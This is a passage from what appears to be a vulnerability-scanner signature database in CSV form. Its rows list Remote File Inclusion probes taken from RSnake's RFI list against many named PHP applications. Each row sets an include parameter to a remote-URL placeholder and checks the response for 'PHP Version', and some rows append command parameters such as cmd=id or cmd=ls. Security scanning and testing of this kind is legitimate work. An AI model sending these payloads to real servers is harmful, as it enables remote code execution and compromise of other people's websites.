list.\",\"\",\"\"\n\"003961\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003962\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003963\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003964\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003965\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003966\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003967\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003968\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003969\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/DON3/applications/don3_requiem.don3app/don3_requiem.php?app_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003970\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/DON3/applications/frontpage.don3app/frontpage.php?app_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003971\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Dir_phNNTP/article-raw.php?file_newsportal=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003972\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/DynaTracker_v151/action.php?base_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003973\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/DynaTracker_v151/includes_handler.php?base_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003974\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Easysite-2.0_path/configuration/browser.php?EASYSITE_BASE=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003975\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Ex/modules/threadstop/threadstop.php?exbb[home_path]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003976\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Ex/modules/threadstop/threadstop.php?new_exbb[home_path]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003977\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Exophpdesk_PATH/pipe.php?lang_file=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003978\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/FirstPost/block.php?Include=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003979\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Flickrclient.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003980\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003981\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003982\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Full_Release/include/body_comm.inc.php?content=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003983\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Gallery/displayCategory.php?basepath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003984\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Include/lib.inc.php3?Include=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003985\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Include/variables.php3?Include=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003986\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Jobline/admin.jobline.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003987\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ListRecords.php?lib_dir=@RFIURL?&cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003988\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Lorev1/third_party/phpmailer/class.phpmailer.php?lang_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003989\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/MOD_forum_fields_parse.php?phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003990\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Mamblog/admin.mamblog.php?cfgfile=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003991\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Net_DNS_PATH/DNS/RR.php?phpdns_basedir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003992\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/NuclearBB/tasks/send_queued_emails.php?root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003993\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/NuclearBB/tasks/send_queued_emails.php?root_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003994\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/OpenSiteAdmin/indexFooter.php?path=@RFIURL%00\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003995\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/OpenSiteAdmin/pages/pageHeader.php?path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003996\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/OpenSiteAdmin/scripts/classes/DatabaseManager.php?path=@RFIURL%00\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003997\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/OpenSiteAdmin/scripts/classes/FieldManager.php?path=@RFIURL%00\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003998\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/OpenSiteAdmin/scripts/classes/Filter.php?path=@RFIURL%00\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003999\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php?path=@RFIURL%00\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004000\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/OpenSiteAdmin/scripts/classes/Form.php?path=@RFIURL%00\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004001\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/OpenSiteAdmin/scripts/classes/FormManager.php?path=@RFIURL%00\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004002\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/OpenSiteAdmin/scripts/classes/LoginManager.php?path=@RFIURL%00\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004003\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/PHP/includes/header.inc.php?root=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004004\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/PHPDJ_v05/dj/djpage.php?page=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004005\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/PHPDJ_v05/dj/djpage.php?page=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004006\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/PaTh/index.php?rootpath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004007\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Path_Script/createurl.php?formurl=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004008\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/PhotoCart/adminprint.php?admin_folder=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004009\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Picssolution/install/config.php?path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004010\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Picssolution/install/config.php?path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004011\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/RGboard/include/footer.php?_path[counter]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004012\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/SPIP-v1-7-2/inc-calcul.php3?squelette_cache=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004013\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/SQuery/lib/gore.php?libpath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004014\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/SazCart/admin/alayouts/default/pages/login.php?_saz[settings][site_url]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004015\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/SazCart/layouts/default/header.saz.php?_saz[settings][site_dir]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004016\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ScriptPage/source/includes/load_forum.php?mfh_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004017\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ScriptPath/footers.php?tinybb_footers=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004018\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ScriptPath/index.php?page=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004019\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Script_Path/config.inc.php?_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004020\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Scripts/app_and_readme/navigator/index.php?page=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004021\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004022\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Somery/team.php?checkauth=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004023\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Upload/install.php?skindir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004024\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Widgets/Base/Footer.php?sys_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004025\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Widgets/Base/widget.BifContainer.php?sys_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004026\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Widgets/Base/widget.BifRoot.php?sys_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004027\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Widgets/Base/widget.BifRoot2.php?sys_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004028\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Widgets/Base/widget.BifRoot3.php?sys_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004029\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Widgets/Base/widget.BifWarning.php?sys_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004030\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004031\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/[path]/mybic_server.php?file=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004032\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/[path]/previewtheme.php?theme=1&inc_path=@RFIURL?cmd\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004033\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/_administration/securite.php?cfg[document_uri]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004034\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/_blogadata/include/struct_admin.php?incl_page=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004035\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/_conf/_php-core/common-tpl-vars.php?admindir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004036\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/_connect.php?root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004037\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/_friendly/core/data/_load.php?friendly_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004038\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/_friendly/core/data/yaml.inc.php?friendly_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004039\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/_friendly/core/display/_load.php?friendly_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004040\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/_friendly/core/support/_load.php?friendly_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004041\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/_functions.php?prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004042\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/_includes/settings.inc.php?approot=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004043\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/_theme/breadcrumb.php?rootBase=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004044\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/_wk/wk_lang.php?WK[wkPath]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004045\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/abf_js.php?abs_pfad=@RFIURL?&cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004046\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/about.php?CONFIG[MWCHAT_Libs]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004047\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/about.php?bibtexrootrel=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004048\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/aboutinfo.php?bibtexrootrel=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004049\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/acc.php?page=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004050\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/access/login.php?path_to_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004051\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/account.php?insPath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004053\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/active/components/xmlrpc/client.php?c[components]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004054\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ad_main.php?_mygamefile=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004055\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/add.cgi.php?blog_theme=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004056\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/add_link.php?blog_theme=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004057\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/addpost_newpoll.php?addpoll=preview&thispath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004058\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/addressbook.php?GLOBALS[basedir]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004059\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/addsite.php?returnpath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004060\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/addvip.php?msetstr[\\\"PROGSDIR\\\"]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004061\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/adm/krgourl.php?DOCUMENT_ROOT=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004062\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/adm/my_statistics.php?DOCUMENT_ROOT=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004063\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin.loudmouth.php?mainframe=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004064\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin.php?Madoa=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004065\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin.php?cal_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004066\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin.php?env_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004067\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin.php?lang=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004068\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin.php?page[path]=@RFIURL?&cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004069\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin.php?submit=submit&form_include_template=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004070\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/PLUGINs/NP_UserSharing.php?DIR_ADMIN=@RFIURL?admin\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004071\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/ST_countries.php?include_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004072\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/ST_platforms.php?include_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004073\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/addentry.php?phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004074\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/addentry.php?phpbb_root_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004075\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/addons/archive/archive.php?adminfolder=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004076\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/admin/admin.php?path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI 